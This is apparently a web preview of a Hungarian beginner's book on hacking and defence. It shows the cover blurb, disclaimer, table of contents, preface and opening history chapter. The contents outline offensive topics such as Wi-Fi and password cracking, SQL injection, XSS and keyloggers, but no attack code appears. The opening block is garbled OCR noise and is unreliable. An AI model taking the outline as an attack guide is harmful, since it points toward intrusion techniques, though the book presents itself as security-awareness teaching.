Kezdő hackerek kézikönyve avagy informatikai támadások és kivédésük
 978-615-5477-44-7 [PDF]

  • 0 0 0
  • Gefällt Ihnen dieses papier und der download? Sie können Ihre eigene PDF-Datei in wenigen Minuten kostenlos online veröffentlichen! Anmelden
Datei wird geladen, bitte warten...
Zitiervorschau

Fehér Krisztián

Kezdő hackerek kézikönyve avagy inform atikai tám adások és kivédésük

l l w v w f c a £ * '* o c s s á ö .U K ; :'. vvLILIaöOCSSSEaeLIKK-'.' " .X Ja a ^ o c o c o c o c s s s s a s ^ L I U a s s a s s a s lI L I L I a s o c s s a s w fc L I L I J- S Hí ,**ococococ****oc9sw »w vw vw vw vw í«aaaaaí3sssssaaM »'U LIL::-r -C': s s s s a s s s a a s s s s a s a íW ik V v L IL IH c K E .... _ í a « , , , ,o ca e w v .. : HEÍZ 11 SCEKí KEKEKELIococas KE LIococacasssaeaswhWKWíililítlKíKi- .1 ‘ a í * * s s a a a aWMraws.L IL I U L1L1 í í E '■' ".OCKEí®K»IiKSI®ws.LI *» a ^ v^«T .T fcrérT.TT .T t.T L I KEKI. . 1 CKE KELI L IL I L I sswtwvLILIKEKS KELI L IL IK ! f ' k c k ííc e l il il ik e . . : : ;3CK í KSÉí l i l i : : : .a sw v U U K fiK E K SK E llilL IiSK f-: c: a e w v L IlIL IL lL lK ? U L IL I5 Q I ICC •-.XOCKSKEKKEEKIHi k e l il l l il l K?aawvwT.TT«mifWÍp,. I X .m i a - X O . wvaaacvniW fciilLIXJKBláSililKiKí C1 :; - o c k b k e l il t l il i l i . Ki asaE acW tX JL X U L IL IL IL rÜ K iK ic ■•ICC KiK»LILlLILlw*w v . . KÉ • w » oca a w rfv U IJU Ú U X » K fcK H . HEtr>w«wvaaaíwvKr .L I s s s s L I : KELI KEHI HEKKrC. v b 3 s s s 3 s « U U L IL IK - 3 Í 3 i I»Í3£ *'‘ * ' jwt.L I L IL IX a L n .il . K EocaaaaEi L IL I Hir.Vb KI-KE ; ’L lv rv ssL IL IL IL IL IL i; ssLIwwn* . :WSMÍ LIKE LX ■' ‘ Z'? L I * * a a L I L IL I L IL I; S3**aawvw* ococLi:::' KELI Kí " ke; KIK?f”-a £ , ,a c L I L I L l f c ; c **aa'.'í wvwv iaoc OCLÍKEHÉ KEKE oc: , a a i : : L la ; vr.:. Hí KELIK?:. • ■ : k k . ; r : a s , , aalJK I-H ;: - -ÖCC. ŰCLI ■ c k ís s . .v su k é ; tOCKSOCKEIXH? ’ L i : : HE: aaiIOGHE E3 KíOC :w v o c * * w *íLI1 OCKíKE CKFHEÖCOCOqtE LIOC KI- ’ ILlKfH r OCM -ÍCEK80CK? Í.JSS3SW. . 1 HKI BtSOf K iíC KBHÍÍÓM-

>E-HE ■-HT-OC

HKKEÓC ' KE

■í OC

wtw v .

OC

WV3S1

aEOCSSOtOCS3S£9£ÓCOCOCS30COCOC****aCOOOCOCOCOCOCOCOCOC3SOC333SSS3SS£Vl>:

32

ocaa EUasKEEIE

Kraaoci - íOwi.LILlWfcg

* g * i* i* i* i* g * i* i * i* i * g * i * i* i* * * .j

.OC 5333

H.K: OCHEM f •HEH?. ’ 0CKS1

K E KK u - i i i < í i i m 0 c 0 I : 0 i: c [ 0 c 0 c o l : o c o ! : . i H i U H g * . * u . ( ; c * g i . k i * J * * * 4 w J 0 C q C 0 C 0C 0C 0C 0 C C , C O CO C0C 0C* * * * * V * 4 * í * * 0 ( : * J > (

Kíwk LIKEOC IILICCKEXfcKEKK

ki*i*iocCCOCOC3 3333233333iOCOCOCOCQCOCCCOCOCOCOC*"1, , , , , , , , * * * ** J* *OCOCOC3233333333S25333SSS3S2CCOCOCOCGCOCGCQCOC*41,

OCÖC '.."SHtHfc OC WI-KÍOCLIwk " í

* •‘***'**>‘-l-**'*oC0 C 0 C £ 3 3 2 = 3 3 3 3 3 3 3 = 2 3 3 3 3 3 3 3 3 3 2 3 3 3 S C C O C C C Q C O C G C O C * ' ' * ' 1 * J * i * i * * * * o C O C 3 3 3 3 3 3 3 2 aSW VW k.W ’.-m W V .V .T.ín .3 3 3 2 3 3 3 5 S S S S O C Ó C C JC O C a C * * * *

:! .:ÍJT'3s£c3£V'"

* ' * * * í * í q c O C S S 3 3 3 E V . T . W V ' - ^ - . L I L I L I L I L I L I L I w i - W W V a S S S S S S S O C O C O C O C ’*' J * *

* ** * **oCoc9saaa5WfcLXULiK: k::kswsX01X-ocí



K~ tOLILIWÍ. öSaESSSSSSOCOtOC : - -: I L I W V 32 3 3 3 3 3 S S S O C , , - - ~ - O C : " : I L I W V 3 3 3 3 S S 3 S O C ....................*

KÍWVWSVí L I L L

x k ek so c :

: ? lW T .a 3 3 3 S S O Í , , . ,* * S H * * .

I .íw v a a s s o c ,

K ísrcascxocL Iw vw L io ca ö 9= 33 '

ix u w w fc,

la a a s t í B M & K i l 'J K í K I H H

T isztelt Olvasd! Ha kíváncsi az olyan témákra, mint például Pavagy J| Iinforrnatikai fám atfáso k * l jés kivédésük w

mikent lehet feltörni egy jelszót, vagy egy webhelyet, esetleg

hogyan

lehet lehallgatni

bárki kommunikációját egy nyílt wifi hálóza­ ton, akkor ez a könyv önnek szol. Sokan a z t

További ajánlataink:

hiszik, hogy ezek ördöngös dolgok, pedig egyál­ talán nem azok. Éppen ezért fontos, hogy vé­ dekezni is keli ellenük, ami szintén nem bonyo­ lult, csak egy kis odafigyelésre van szükség. Könyvünk mindkét oldalt megmutatja, elret­ tentésképpen a lehetőségeket, okulásként a védekezési módokat. Ha ön a z t hiszi, hogy biztonságban van, hiszen nem csinál semmi illegálisát és még vírusirtó is van a gépén, akkor nagyon téved! Teijeskörű védelem ugyanis nem létezik! Ha elolvassa ezt a könyvet, meg fog döbbenni, hogy milyen sok tám adási lehetőség van adataink ellen. A könyv, azon túl, hogy ism erteti, mit jelente­ nek az

informáciőbiztonsági szakkifejezések

olyan témákkal foglalkozik, mint hogy milyen eszközök tám adhatok és hogyan, hogyan dol­ gozik egy hacker, mekkora kockázatot jelent az emberi tényező" (social engineering), stb. Kitér ISBN 978-615-5477-44-7

a jelszavak biztonságára, a különféle hackeléshez használható programokra és azok kezelé­ sére, a billentyuzetnaplőzási lehetőségekre, a hálózatok és weboldalak tám adására és feltö­ résére, az online bankolási kockázatokra, a t i t ­

786155 477447

kosítási módszerekre, illetve hogy m it érdemes tenni a biztonságos a d a ttá ro lá s érdekében. Természetesen senkit sem akarunk illegális te ­

D KÖNYVKIADÓ ES INFORMATIKAI

vékenységre buzdítani, célunk sokkal inkább a z t megmutatni, hogy mekkora veszélynek vagyunk kitéve, ezáltal a tám adási és védekezési lehetős­ ségek bemutatásával ösztönözzük az embere­

ARA: 1970 Ft fié fe z ie fe é

ket a biztonságosabb számítőgéphasználatra.

ttu U . b b S vh

Fehér Krisztián

BBS-INFO Kiadó, 2016.

4

Kezdő hackerek kézikönyve

Minden jog fenntartva! A könyv vagy annak oldalainak másolása, sokszoro­ sítása csak a kiadó írásbeli hozzájárulásával történhet. A könyv nagyobb mennyiségben megrendelhető a kiadónál: BBS-INFO Kiadó, 1630 Bp. Pf. 21. Tel.: 407-17-07 Figyelem! A könyvben leírt tevékenységek egy része illegális, illetve sértheti mások jogait, vagy az adott ország törvényeit. Az esetleges végrehajtásukból eredő következményekért sem a kiadó sem a szerző nem vállal feleősséget! A könyv megírásakor a szerző és a kiadó a lehető legnagyobb gondossággal járt el. Ennek ellenére, mint minden könyvben, ebben is előfordulhatnak hibák. Az ezen hibákból eredő esetleges károkért sem a szerző, sem a kiadó semmiféle felelősséggel nem tartozik, de a kiadó szívesen fogadja, ha ezen hibákra felhívják figyelmét.

ISBN 978-615-5477-44-7 Kiadja a BBS-INFO Kft. 1630 Budapest, Pf. 21. Felelős kiadó: a BBS-INFO Kft. ügyvezetője Nyomdai munkák: Biró Family Nyomda

TARTALOMJEGYZÉK

5

TARTALOMJEGYZÉK

Előszó ........................................................................................................ 10 1. HACKER TÖRTÉNELEM........................................................................... 15 1.1. A „hacker" szó eredetéről és értelmezéséről.......................... 15 1.2. Miért léteznek hackerek?........................................................... 17 1.3. Miért lehet hackelni?...................................................................18 1.4. A hackerek titkai?....................................................................... 18 1.5. A szoftverkalózkodásról............................................................ 19 1.6. A „tuti" hacker módszerekről................................................... 20 1.7. A hackercsoportok jövője.......................................................... 20 1.8. Elit hackercsoportok és a politika............................................ 21 2. Informatikai támadások madártávlatból................................ 23 2.1. Gondolatok az adatvédelemről................................................ 23 2.2. A biztonság mítosza................................................................... 25 2.3. Visszaélések típusai.................................................................... 26 2.4. Adatbiztonság és adatvédelem................................................. 27 2.4.1. Adatbiztonsági fenyegetettségek...................................... 27 Rendelkezésre állás ellen irányuló fenyegetettség................27 Sértetlenség ellen irányuló fenyegetettség.............................. 28 Hitelesség ellen irányuló fenyegetettség................................. 29 Bizalmasság ellen irányuló fenyegetettség............................. 30 2.5. Hackerek típusai........................................................................... 30 Fehér kalapos hacker („white hat hacker")............................ 30 Fekete kalapos hacker („black hat hacker")............................ 31 Szürke kalapos hacker („grey hat hacker")............................ 31 Elit hacker („élite hacker")........................................................ 31 Szkriptkölyök („script kiddies").............................................. 31 Hacktivista („hacktivist").......................................................... 31 Telefon hacker („phreaker")..................................................... 31

Kezdő hackerek kézikönyve

6

2.6.

Támadások, támadóeszközök, szakkifejezések.................... 32 Adathalászat („Spoofing attack, phishing,/) .........................32 Aranymosás.......................................................................... 32 Befecskendezés ("injection")................................................. 32 Betörő készlet („rootkit")...................................................... 32 Billentyűnaplózás („keystroke logging, keylogging")......... 32 Csomagelemzés („packet analyzis").....................................33 Emberek félrevezetése („social engineering")...................... 33 Feltörés („cracking")............................................................ 33 Féreg („worm").....................................................................33 Hagyma útvonalválasztás („onion routing").......................34 Flarci kocsikázás („war driving")......................................... 34 Hash ütközés ("hash colosion")............................................ 34 Hátsó kapu („backdoor")..................................................... 34 Jelszavak feltörése („password cracking7') ...........................34 Kémprogramok ("spyware").................................................35 Kéretlen levelek („SPAM").................................................. 35 Kéretlen reklámprogramok („adware")............................... 35 Kódvisszafejtés ("reverse engineering")............................... 35 Könyvtárbejárás ("directory traversal")................................ 36 Közbeékelődéses támadás („man-in-the-middle attack") ....36 Köztes oldalon keresztül történő szkripthívás („Corss-site scripting, XSS")....................................... 36 Kriptográfia („cryptography").............................................36 Kriptovírus („crypto virus").................................................36 Lábnyomkészítés ("footprinting")........................................ 36 MAC cím hamisítás („MAC spoofing")............................... 36 Meglesés („shoulder surfing")..............................................37 Mézesbödön ("honeypot").................................................... 37 Munkamenet ellopása, eltérítése ("session hijacking")........ 37 Nulladik napi sebezhetőség („zero day vulnerability")..... 37 Nyers erő alapú támadás („brute-force attack").................. 37 Rosszindulatú program ("malware")....................................38 Sérülékenységvizsgáló eszköz („vulnerability scanner")....38 SQL befecskendezés („SQL injection").................................38 Sütimérgezés ("cookie poisoning")....................................... 38 Szivárvány tábla („rainbow table")..................................... 38 Szolgáltatás megtagadásos támadás („Denial Of Service", „DOS")..................................... 38 Trójai programok („trojan")................................................. 39

TARTALOMJEGYZÉK

7

Ujjlenyomatkészítés ("fingerprmting")....................................39 Vadon ("wild")............................................................................39 Vírus („vírus")............................................................................ 39 Visszafejtés („reverese engineering")......................................40 Zombihálózat („botnet")........................................................... 40 Zsaroló programok („ransomware").......................................40 3. Támadható célpontok a mindennapokban ...............................41 3.1. Okos tévék...................................................................................42 3.2. Otthoni internetkapcsolatok típusai........................................43 3.3. Az internethozzáférés biztonsága............................................45 3.4. Böngésző bővítmények..............................................................46 3.5. Figyeljünk oda az URL-ekre!.................................................... 47 3.6. Az operációs rendszerek........................................................... 48 3.7. Mobileszközök............................................................................49 3.8. A dolgok internete...................................................................... 51 3.9. A „felhő" technológiáról........................................................... 52 3.10. Virtuális valóság.........................................................................52 3.11. Önvezető autók...........................................................................53 3.12. Víruskeresők használata............................................................53 3.13. Anonim internetezés..................................................................54 3.13.1. Privát böngészés...............................................................54 3.13.2. Virtuális magánhálózatok...............................................56 3.13.3. Proxyk használata............................................................ 57 3.13.4. Adatok küldése e-mail postafiók nélkül.......................58 3.14. A Tor hálózatról.......................................................................... 59 3.15. Online fizetés és bankolás......................................................... 60 3.16. Közösségi média és a megosztások.......................................... 62 3.17. Hogyan ismerjük fel egy ellenünk végrehajtott támadást?.. 63 4. SOCIAL ENGINEERING: AZ EMBER, MINT BIZTONSÁGI KOCKÁZAT............................................ 68 4.1. Munkahelyi példa....................................................................... 68 4.1.1. Azok a telefonhívások........................................................ 70 4.1.2. A biztonsági szolgálatok felelősségéről...........................72 4.2. Otthoni példa.............................................................................. 72 4.3. Email alapú támadások............................................................. 74 4.4. Közösségi hálózatok veszélyei..................................................76 5. Adattárolók biztonsága ................................................................ 77 5.1. A biztonsági másolatok fontossága......................................... 77 5.2. Biztonsági mentések - SyncToy................................................ 79 5.3. Adatok biztonságos törlése....................................................... 80

8

6.

7.

8.

9.

Kezdő hackerek kézikönyve

5.4. Egy speciális terület: meghajtók klónozása........................... 82 5.5. Drivelmage XML és MiniTool Partidon Wizard Free..........83 5.6. Hálózati meghajtók, meghajtók megosztása.......................... 84 5.7. Belső hálózat feltérképezése, erőforrásoktámadása.............. 86 5.8. Mobileszközök.......... ..................................................................86 Titkosítás.............................................................................................. 87 6.1. Titkosítási módszerek................................................................ 87 6.2. Ujjlenyomatok, hash-ek............................................................. 88 6.2.1. MD5......................................................................................... 89 6.3. Rejtjelezés..................................................................................... 90 6.4. Szövegek rejtjelezése.................................................................. 92 6.5. Fájlok rejtjelezése........................................................................ 95 6.6. Meghajtók titkosítása kereskedelmi szoftverekkel................97 Káli linux - Biztonsági tesztelés felső fokon .......................... 98 7.1. A Káli Linux telepítése............................................................... 98 7.2. Windowsról történő telepítés................................................... 99 7.3. Linux alól történő telepítés...................................................... 100 7.4. Egyéb telepítési módok........................................................... 101 7.5. Gyors áttekintés........................................................................ 102 Hálózati hozzáférések elleni támadások............................... 106 8.1. Információgyűjtés..................................................................... 106 8.2. WIFI jelszó feltörése - Reaver.................................................. 109 8.3. Offline WIFI jelszótörés - Cowpatty...................................... 115 8.4. Androidos hotspot feltörése................................................... 118 8.5. Védekezési javaslatok routerekhez........................................ 118 J elszavak elleni támadások ......................................... 122 9.1. Milyen egy jó jelszó?......................................................... ,.... 122 9.2. Jelszógeneráló........................................................................... 126 9.3. Jelszavak feltörése.................................................................... 126 9.4. Apropó véletlenszerűség......................................................... 127 9.5. Miért kellenek jeszólisták?...................................................... 128 9.5.1. Egy szóból alkotható variációk száma........................ 128 9.5.2. Pontosabb becslések....................................................... 129 9.6. A jelszavak feltöréséről............................................................ 130 9.6.1. Brute force módszer....................................................... 131 9.6.2. Gyors jelszótörés............................................................ 133 9.7. Windows jelszó feltörése, visszaszerzése.............................. 136 9.7.1. A Windows jelszavak tárolása..................................... 136 9.7.2. Módszer lustáknak......................................................... 137 9.7.3. Látványos módszer........................................................ 138

TARTALOMJEGYZÉK

9

10. Billentyűnaplózás.......................................................................... 143 10.1. Egy billentyűnaplózó program............................................... 144 11. Webes támadások ......................................................................... 146 11.1. Hogyan zajlik egy hálózati támadás?.................................... 146 11.2. Információ gyűjtése webszerverről........................................ 147 11.3. Google.........................................................................................149 11.3.1. Keresés csak adott weboldalon.................................... 150 11.3.2. Keresés URL-ekben........................................................ 150 11.3.3. Fájltípusok keresése....................................................... 151 11.4. Tesztkörnyezet létrehozása: WAMP szerver........................ 149 11.5. Könyvtárbejárás........................................................................ 159 11.6. Komplex elemzés végrehajtása............................................... 162 11.7. Forráskódelemzés és kód módosítása Firefox Developer toolbar........................................................ 163 11.8. Weboldal tükrözése - cURL.................................................... 165 11.9. Teljes weboldalak tükrözése - HTTrack................................ 166 11.10. Webes kommunikáció elemzése - Firefox Developer....... 170 11.11. Adatforgalom lehallgatása - Wireshark............................... 170 11.11.1. Haladó információk....................................................... 177 11.12. XSS támadások....................................................................... 178 11.13. SQL befecskendezés................................................................. 184 11.14. Sütimérgezés............................................................................. 192 11.14.1. Hibrid technika............................................................... 193 11.14.2. A Páros Proxy használata............................................. 197 11.14.3. Munkamenetek ellopása............................................... 202 11.15. DOS támadások........................................................................ 202 11.16. Tártúlcsordulás előidézése...................................................... 205 11.17. Weblapépítő keretrendszerek................................................. 205 12. Zárszó helyett............................................................................... 207 13. Függelék .......................................................................................... 208 13.1. Hasznos weboldalak................................................................ 208 13.2. Ajánlott irodalom..................................................................... 209 13.3. A Reaver kapcsolói................................................................... 211 13.4. Windowsos parancssoros gyorstalpaló................................. 212 13.4.1. Hálózati parancsok........................................................ 213 13.4.2. Információgyűjtés a számítógépről............................. 217 13.5. Egy billentyűnaplózó program forráskódja......................... 220 13.6. Tíz hatványai.............................................................................222 13.7. Informatikai mértékegységek................................................. 223

10

Kezdő hackerek kézikönyve

A mindennapjainkat átszövő informatikai megoldásokat sokszor tudatosan használjuk, ám legtöbbször talán nem is gondolunk ebbe bele. Használatuk során információkhoz ju­ tunk és információkat osztunk meg magunkról. Ezt úgy is szok­ ták mondani, hogy „digitális lábnyomokat" hagyunk magunk után. Napjainkban az információ sok esetben olyan értéket képvisel, amit közvetlen, vagy közvetett módon pénzzé lehet tenni, vagy más módon hasznot lehet belőle húzni. Ez pedig sajnos történhet rossz szándékkal is. A korábban csak a televíziók képernyőjén látott „kiberbűnözők" manapság teljesen megszokott szereplőivé váltak a hét­ köznapoknak, naponta olvasunk, hallunk híreket arról, hogy támadás ért egyik vagy másik weboldalt, számítógépes rend­ szert. A kiberbűnözők és a védekező oldal állandó versenyfu­ tásban vannak, melyben a támadó oldal van előnyben, mert gyorsabban ki lehet használni egy biztonsági rést, mint kidol­ gozni és elkészíteni az ellenszerét, különösen úgy, hogy nem is tudunk róla. A számítógépes bűnözők olyan emberek, akik jogtalanul sze­ reznek és használnak fel információkat. Ők a crackerek, táma­ dók, akik a hackerektől eltérően többnyire etikátlanul járnak el. A hacker szót tehát valójában tévesen használják gyűjtőfoga­ lomként a „bűnözők"-re. Erre később még visszatérünk. E könyvben különböző támadási módszereket szeretnénk megismertetni a nagyközönséggel, bemutatva olyan techniká­ kat is, melyeket magas szinten a valóságban is használnak a rossz fiúk. Az ellenük történő védekezésnek ugyanis a megis­ merés a legbiztosabb alapja. Ez a könyv nem a (potenciális) bű­ nözőknek szól és nem hivatott senkit sem felkészíteni arra,

Előszó

11

hogy törvénybe ütköző cselekedeteket hajtson végre. Éppen ellenkezőleg! Óva intünk ettől mindenkit. A legáltalánosabb hackelési technikák bemutatása mellett a hétköznapi emberek számára kívánunk tanácsokkal szolgálni. Olyan tanácsokkal, melyek segítségével hatékony válaszokat tud adni a napjainkra egyre inkább terjedőben levő informatikai bűnözés kihívásaira. A védekezés felé megtett első lépés a meg­ értés. Mivel állunk szemben? Mit jelentenek a különböző szakkifejezések? Hogyan férhetnek hozzá adatainkhoz? A megértés teszi lehetővé a védekezési módok meglátását és keresését. Célkeresztben az információ

Az informatika világában az értéket az információ képviseli. Az információ körül forog minden. Minél több van belőle, annál értékesebb lesz. Ha bizalmas információkról van szó, az tovább növeli az információ értékét. (Nagyon tágan értelmezve, kvázi a bankszámlán lévő pénz is csupán információ.) Napjainkban két, egymással ellentétes folyamat figyelhető meg a hétköznapokban: az emberek egyre több információt tesznek közzé magukról, miközben egyre nagyobb erőfeszíté­ sek szükségesek az információk védelme érdekében. Ebből egyenesen következik, hogy az információkhoz történő jogosu­ latlan hozzáférések száma is egyre nagyobb lesz. Gondolatok a személyes adatokról

Könyvünk megírásának kezdetén egy dilemmával találtuk magunkat szembe: hogyan adhatunk tanácsot az embereknek bizalmas adataik védelmével kapcsolatban, hogy közben ne adjunk akaratlanul is ötleteket arra vonatkozóan, hogy hogyan lehet ilyen információkat megszerezni? Stratégiánk az, hogy a különböző módszerek inkább általános, példaszerű leírását és az ellenük történő védekezés lehetőségeit adjuk közre. Az olva­ só így ismereteket szerezhet a témában és tudását is gazdagít­ hatja, anélkül, hogy nagyon el kellene távolodnia a „gyakorlat­ tól". Az ismeretátadás ezen biztonságos megközelítése alatt értjük annak az ismertetését is, ahogyan egy valódi hacker gon­ dolkodik és dolgozik.

12

Kezdő hackerek kézikönyve

A reklámoknak és a fogyasztás világának köszönhetően az emberek számítástechnikai eszközökkel végzett szinte minden tevékenysége hagy valamilyen nyomot. Ez az ún. digitális láb­ nyom. Ez lehet egy telefonhívás adatainak rögzítése, egy e-mail elküldése, egy naplófájl, egy elmentett dokumentum, szinte bármi. A különféle telekommunikációs szolgáltatók, nagy szoftver­ cégek, hírszerző szervezetek és persze a „szabadúszó" bűnözők is rengeteg információt állítanak össze mindenkiről, aki infor­ matikai eszközöket használ. Ennek tudatában kell lennünk, mert már a személyes infor­ mációk keletkezése is szinte észrevétlenül átszövi életünket. Alapvető fontosságú a személyes információk kezelésével kap­ csolatos tudatosság kialakítása. Tudnunk kell, hogy személyes adataink csak hozzánk köthetőek, ránk vonatkoznak és senki­ nek sincsen joga akaratunkon kívül tárolni, vagy felhasználni azokat. Ennek megértése elsősorban a fiatalabb generációk számára fontos, mivel ők már „beleszületnek" egy olyan világ­ ba, ahol rengeteg információ keletkezik és kering körbe-körbe a Földön. A világ mammutcégei számára hatalmas értéket képviselnek a potenciális vásárlóik szokásai. Talán bele sem gondolunk egy webáruház böngészése közben, hogy nagy valószínűséggel minden mozdulatunkat kiértékelik és rögzítik. Hová kattin­ tunk, mennyi időt töltünk egy-egy oldalon, milyen kifejezésekre keresünk rá és még hosszasan sorolhatnánk. Noha ezen statisz­ tikák mérése és kiértékelése elvileg anonímizált módon zajlik, erre kevés a garancia, és ha így is van, az az igazság, hogy az anonímmá tett adatok jelentős része mégiscsak felhasználható konkrét emberek azonosítására, mint azt több kutatás utólag bebizonyította. Ezért aztán könyvünk az információ védelméről is szól és bemutatja az információk jogosulatlan megszerzésére törekvő ellenoldal egyes módszereit is. Félreértés ne essék: nem paranoiás szemlélet kialakítása a cé­ lunk! Ez már a ló túloldalára történő átesés lenne. Ellenben igenis célunk egy egészséges, felvilágosult szemlélet kialakítása

Előszó

13

arról, mi történik, és mi történhet adatainkkal ilyen vagy olyan esetekben és hogyan befolyásolhatjuk ezt. A könyvünkben leírt ismeretanyag továbbá azt a biztonsági tudatosságot is terjeszteni kívánja, ami számos munkahelyen sajnos még manapság is hiányzik. A könyv felépítése

Könyvünk felépítése messzemenően gyakorlatorientált. A fe­ jezeteket igyekeztünk hétköznapi élethelyzetek köré felépíteni és sok példával illusztrálni. Több esetben szoftvereket is bemu­ tatunk, melyeket a jó és a rossz oldalon álló szakemberek egy­ aránt felhasználnak védekezésre, ill. támadásra is. A fejezetek tárgyalásakor a fokozatosság elvét alkalmazzuk. Az első két fejezetben alapfogalmakat tisztázunk és igyekszünk megvetni az alapjait a biztonságtudatos gondolkodásnak. Miután megismertük azt, hogy miről fog szólni a könyv, a 36. fejezetekben biztonsági kockázatokról ejtünk szót, egyszerű, laikusok által is könnyen megérthető formában. Itt már néhány egyszerű gyakorlati példát is mutatunk. A könyv második fele (7-11. fejezetek) különféle támadási és védekezési módszereket mutat be, melyek már némi számítástechnikai jártasságot igényelnek, de könnyen kipróbálhatóak, mivel lépésről lépésre leírunk mindent. Itt tehát már zömében gyakorlati példákkal találkozhatunk és a példák komplexebbek is lehetnek. Egyre több alkalmazást és módszert, valamint ezek kombinációját mutatjuk be, mely már valóban megközelíti a valódi támadók módszereit. A könyv végén lévő függelék számos hivatkozást tartalmaz, melyek segítségével tovább bővíthetjük ismereteinket, illetve utat találhatunk egy-egy speciálisabb téma felé is. Szintén a függelékben kaptak helyet olyan információk is, melyek a könyv fejezeteinek sorába nem kerültek bele, de hasznosak, érdekesek lehetnek a könyv témaköreivel történő ismerkedés során. Nem minden módszert, technikát mutatunk be, ez jóval meg is haladná egy könyv kereteit. Mégis igyekeztünk olyan témá-

14

Kezdő hackerek kézikönyve

kát válogatni, melyekkel hétköznapokban gyakran találkozha­ tunk, illetve minél több területet lefednek. A valódi hackerek folyamatosan naprakészen tartják tudásu­ kat és fejlesztik magukat. Erre bíztatjuk olvasóinkat is, és ehhez könyvünk is kiváló ugródeszka lehet. Egy könyv elolvasása után azonban még senkiből nem lesz profi hacker. Ehhez renge­ teg gyakorlat, komoly tudás és kitartás szükséges. A könyvben bemutatott módszerek kipróbálásáról

A könyv példáinak kidolgozásához elszigetelt tesztkörnyeze­ tet, illetve saját hálózatot használtunk. Ezt javasoljuk olvasó­ inknak is. Óvva intünk mindenkit attól, hogy olyan tevékeny­ ségekbe kezdjen, ami külső szolgáltatások megzavarására, vagy egyéb károkozásra alkalmas. Ezekért nem vállalunk felelősséget! / Általánosságban elmondható, hogy saját hálózatunk vagy jelszavaink feltörése tökéletesen elégséges egy-egy módszer működésének a megismeréséhez. Szóval első felbuzdulásunk­ ban ne kezdjük el vadul feltörni a szomszéd vegyesbolt WIFI jelszavát, mert annak rossz vége lehet... A szerzőről

A szerző veterán szoftvertesztelő, minőségbiztosítási tanács­ adó, Magyarországon dolgozik. Gyerekkorában autodidakta módon tanult meg programozni, az évek során számos prog­ ramozási nyelvvel megismerkedett. Megszerzett tudását elősze­ retettel használja alternatív, kísérleti alkalmazások készítésére, melyek egy része ingyenesen elérhető, sőt vannak köztük nyílt forráskódúak is. Néhány vonatkozó segédprogramjával ebben a könyvben is találkozni fogunk. Sok időt fordít saját térinformatikai keretrendszerének fej­ lesztésére, a ZEUSZ-ra, mellyel a NASA-ig is eljutott. Az Adobe Flash platform és az AIR keretrendszer, valamint áz Android operációs rendszer lelkes híve. Több könyve is megjelent már a hazai könyvesboltokban. Munkáiról bővebben a http://feherkrisztian.magix.net/public weboldalon is lehet olvasni.

Hacker történelem

15

1. Hacker történelem 1.1.

A „hacker" szó eredetéről és értelmezéséről

A „hacker" és az ehhez kapcsolódó kifejezéseket többféle­ képpen lehet magyarázni. Maga a hacker szó az angol "hack" igéből képezhető. Pontos fordítása nincsen, de lefektetett szabályrendszerek megkerülé­ sét értik alatta, közismertebben a „feltörni", „behatolni" kifeje­ zéseket. A „hackerség" kialakulása teljesen független a rosszindulatú tevékenységektől. A számítástechnika hőskorában, évtizedek­ kel ezelőtt, a felhasználók, akik többnyire hivatásos számítástechnikai szakemberek voltak, gyakorta szembesültek olyan problémákkal munkájuk során, melyet csak az általuk használt rendszerek igen mély ismeretének kiaknázásával, vagy ezen rendszerek nem dokumentált, sokszor csak kerülőutakon elér­ hető lehetőségeivel tudtak csak megoldani. Nem volt választá­ suk, egyszerűen rá voltak kényszerítve, ha hatékonyan el akar­ tak végezni bizonyos munkákat. Ezek a szakemberek voltak az első hackerek. (Ide sorolhatóak azok az úriemberek is, akik nem számítógépekkel, hanem telefonhálózatok manipulálásával töl­ tötték szabadidejüket, mely tevékenységek azonban még egy­ szerűbb formáikban is jócskán átlépték a legalitás határát.) Az idők során a hackerek öntudatos szubkultúrát alakítottak ki, mely baráti társaságokban, vagy klubszerűén szerveződő közösségekben élt, később pedig hivatalos konferenciákat, összejöveteleket is szerveztek. A mikroszámítógépek aranyko­ rában a hackerek különböző összejöveteleken be is mutatták azon képességüket, hogy maximálisan ki tudták használni a

16

Kezdő hackerek kézikönyve

korabeli számítógépek lehetőségeit ("demo scene" összejövete­ lek). Ilyen közösségek mind a mai napig léteznek és korántsem idejétmúlt dologról van szó, sőt! A hackerek tudása igen jöve­ delmező tud lenni és egyre értékesebb is lesz. Az elterjedt vélemények szerint hackernek senki sem mond­ hatja magát, ezt a „státuszt" a hacker közösségnek kell elismer­ nie. Egyes megközelítés szerint léteznek ún. fehér-, szürke- és fekete kalapos hackerek, akiket szándékuk szerint lehet megkü­ lönböztetni, és amely elnevezésekre később még ki fogunk tér­ ni. Napjaink egyik trendje például pont az ún. etikus hackerek foglalkoztatása. Ebben az esetben hackerek legálisan végzett és fizetett tevékenységet végeznek egy munkáltatónál. Fő felada­ tuk biztonsági kockázatok feltárása. Sőt mi több, még etikus hacker tanfolyamok, workshopok is léteznek. A köztudatban a hacker szót kizárólag negatív értelemben használják a számítógépes bűnözés elkövetőire. Ez a sajtó fele­ lőtlen nagyotmondóinak köszönhető és kevés köze van a való­ sághoz. Az ún. cracker-ek és a hackerek viselkedése között lé­ nyegi különbség van, amit egy példával is megvilágítunk: Vegyünk egy autótolvajt és egy autóriasztókkal foglalkozó szakembert! Mindketten képesek feltörni autókat. Az előbbi meg is teszi, az utóbbi azonban tudását arra használja fel, hogy minél nagyobb biztonságban tudhassák az emberek az autóikat a tolvajoktól. A példában az autótolvaj a cracker, az utós biz­ tonsági szakember pedig a hacker kifejezés megtestesítője. A hacker a tudását károkozás nélkül, sőt annak megelőzésére használja, a cracker saját önös, és/vagy anyagi érdekeinek ren­ deli alá azt. (Érdekes egyébként, hogy a cracker tevékenységek­ hez köthető szoftverkalózkodást ugyanaz a sajtó mindig nem hajlandó egyértelműen kriminalizálni.) A hacker kultúra alapjai évtizedekkel ezelőtt a UNIX számí­ tógépes rendszerek körül alakultak ki. Akkoriban a számítástechnikai szakemberek gyakran önképzéssel sajátítottak el olyan ismereteket, melyek messze az átlagos felhasználó szintje fölé emelték őket szaktudás tekintetében. Ez gyakorta progra­ mozással is párosult és ezek a szakemberek képesek voltak olyan megoldásokra, melyekkel a rendszerek rejtett, dokumen­

Hacker történelem

17

tálatlan képességeit is ki tudták használni. Ezt a tudást azonban nem visszaélésekre, hanem jobb rendszerek létrehozására hasz­ nálták fel. A nyílt forráskódú közösségi szemlélet kialakulása is abban az időben kezdett kialakulni. Akkoriban a felhasználó és a programozó gyakorta ugyanaz a személy volt, mivel progra­ mozói tudás nélkül nem lehetett használni ezeket a gépeket.

1.2.

Miért léteznek hackerek?

